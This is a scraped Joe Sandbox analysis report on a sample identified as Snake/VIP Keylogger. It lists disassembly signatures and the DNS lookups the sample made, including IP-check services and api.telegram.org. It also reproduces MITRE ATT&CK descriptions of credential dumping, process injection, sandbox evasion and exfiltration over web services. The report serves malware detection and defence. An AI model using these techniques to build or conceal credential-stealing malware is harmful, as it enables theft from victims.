Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05620B99h	4_2_056208F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562E3C6h	4_2_0562E0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05620741h	4_2_05620498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562D616h	4_2_0562D348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05622A01h	4_2_05622758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562B626h	4_2_0562B358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 056255D1h	4_2_05625328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562F606h	4_2_0562F338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 056225A9h	4_2_05622300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562BAB6h	4_2_0562B7E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562FA96h	4_2_0562F7C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05625E81h	4_2_05625BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562DAA6h	4_2_0562D7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05622E59h	4_2_05622BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05625A29h	4_2_05625780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05627119h	4_2_05626E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05624D21h	4_2_05624A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05621CF9h	4_2_05621A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 056248C9h	4_2_05624620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562CCF6h	4_2_0562CA28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05626CC1h	4_2_05626A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562ECE6h	4_2_0562EA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05627571h	4_2_056272C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562B196h	4_2_0562AEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05625179h	4_2_05624ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05622151h	4_2_05621EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562F176h	4_2_0562EEA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562D186h	4_2_0562CEB8

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 5qJ6QQTcRS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5qJ6QQTcRS.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
5qJ6QQTcRS.exe

Function 075706E0 Relevance: 9.7, Strings: 7, Instructions: 991
COMMON

Function 07635C90 Relevance: 5.5, Instructions: 5514
COMMON

Function 07574E58 Relevance: 5.2, Instructions: 5233
COMMON

Function 0791E368 Relevance: 5.2, Strings: 4, Instructions: 190
COMMON

Function 07636857 Relevance: 4.8, Instructions: 4796
COMMON

Function 07694378 Relevance: 4.6, Strings: 1, Instructions: 3317
COMMON

Function 00E27D00 Relevance: 2.8, Strings: 2, Instructions: 331
COMMON

Function 00E25470 Relevance: 12.8, Strings: 10, Instructions: 251
COMMON

Function 00E25461 Relevance: 9.0, Strings: 7, Instructions: 221
COMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre